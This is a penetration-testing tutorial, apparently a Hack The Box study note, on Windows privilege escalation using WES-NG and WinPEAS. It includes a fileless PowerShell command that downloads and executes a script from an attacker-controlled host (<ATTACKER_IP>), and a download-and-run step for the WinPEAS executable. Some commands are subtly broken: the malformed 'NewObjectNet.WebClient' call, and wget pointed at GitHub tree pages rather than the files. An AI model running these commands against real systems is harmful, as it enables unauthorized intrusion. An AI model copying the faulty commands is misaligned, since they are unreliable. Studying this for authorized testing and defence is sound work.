Windows Privilege Escalation

Windows Privilege Escalation is the process of elevating access from a low-privilege user (like a standard user) to a higher-privilege user (such as Administrator or NT AUTHORITY\SYSTEM).

Initial Enumeration

Before running any automated tools, get a feel for the system. A key piece of information is the installed .NET Framework version, as this determines which tools (like WinPEAS) will run natively.

c:\Users>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"  
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"  
  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5

The output will list the installed versions. If you see v4.5 or higher, you can likely run modern .NET executables. If you only see older versions (v2.0, v3.5), you may need to rely on PowerShell v2, batch scripts, or older compiled tools.

Windows Exploit Suggester - Next Generation (WES-NG)

WES-NG is an offline Python script that identifies missing security patches that could lead to privilege escalation. It works by comparing the output of the Windows systeminfo command against its own updated database of Microsoft vulnerabilities. It's a great first step because it doesn't run any code on the target machine besides the built-in systeminfo.

On the Target Machine, generate the system information file:

C:\Users\user> systeminfo

On Attacker Machine

Method 01:

#Clone the repository
git clone https://github.com/bitsadmin/wesng.git
cd wesng

(Optional but recommended) Create a Python virtual environment

python -m venv venv
source venv/bin/activate

#Install requirement and update WES-NG's vulnerability database
pip install chardet
python wes.py --update

#Run WES-NG against the systeminfo file
python wes.py ../systeminfo -o ../wes-output.csv

Method 02:

#Install wesng globaly
pipx install wesng

#Install requirement
pipx install chardet

#Update WES-NG's vulnerability database
wes --update

#Run WES-NG against the systeminfo file
wes systeminfo -o systeminfo.csv

What to look for in the output:

WES-NG will provide a list of vulnerabilities (CVEs) and their corresponding Microsoft Knowledge Base (KB) numbers.

[+] CVE-2019-0859, KB4500331
    Name: Windows Win32k/USER32 Uninitialized Use-After-Free Privilege Escalation Vulnerability
    [...]
    Exploit: https://www.exploit-db.com/exploits/46797/
    [...]
  • Focus on exploits with public code: Look for entries that have a known Exploit-DB link or a GitHub repository.
  • Check for reliability: Not all public exploits are stable. Read the exploit code or description to see if it's reliable or might crash the system.
  • False Positives: WES-NG can have false positives. It suggests vulnerabilities based on the OS build number but can't confirm if a specific patch has been applied manually. Always treat its output as a suggestion, not a guarantee.

Winpeas

WinPEAS is a script that automatically searches for a wide range of privilege escalation vectors on a Windows system. Unlike WES-NG, which only looks for missing patches, WinPEAS checks for misconfigurations, stored credentials, weak permissions, and much more. It is very loud and should only be used when stealth is not a concern.

How to Use

On the attacker machine, download the appropriate version of WinPEAS.

  • winPEASx64.exe / winPEASx86.exe: The best option if the target has the required .NET Framework (v4.5.2+) and antivirus is not aggressively blocking it.
  • winPEAS.bat: A batch script version. It is less comprehensive but has no dependencies, making it a great fallback for older systems or when .NET is not available.
  • winPEASany.ps1: The PowerShell version. Useful for environments with execution restrictions or for running fileless/in-memory.
#Download the script
wget https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe #(.Net >= 4.5.2 required)
wget https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASps1

wget https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASbat

#Start an HTTP server to host the files
sudo python3 -m http.server 8001

On target machine

Choose one of the following methods to download and run WinPEAS on the target.

Powershell

#This downloads and executes the script without writing it to disk
powershell -c "IEX(NewObjectNet.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/winPEAS.ps1')"

EXE file

# Download the file
powershell -c "Invoke-WebRequest -Uri 'http://<ATTACKER_IP>:<PORT>/winPEASx64.exe' -OutFile 'C:\Windows\Temp\winpeas.exe'"

# Run it
C:\Windows\Temp\winpeas.exe

Tags

windows-privesc

Notes

Some of this writeup is revised by AI. My own writing can be a bit clunky, so I get it to review certain parts to make things flow better and be a bit easier to read.

If you liked this content, please give me a respect on my Hack The Box profile. I'd be happy to hear I've helped you.

If anything here isn't clear, check out the cookbook. If you can't find the answer or need further clarification, please contact me at my e-mail.

Last updated: 2025-10-03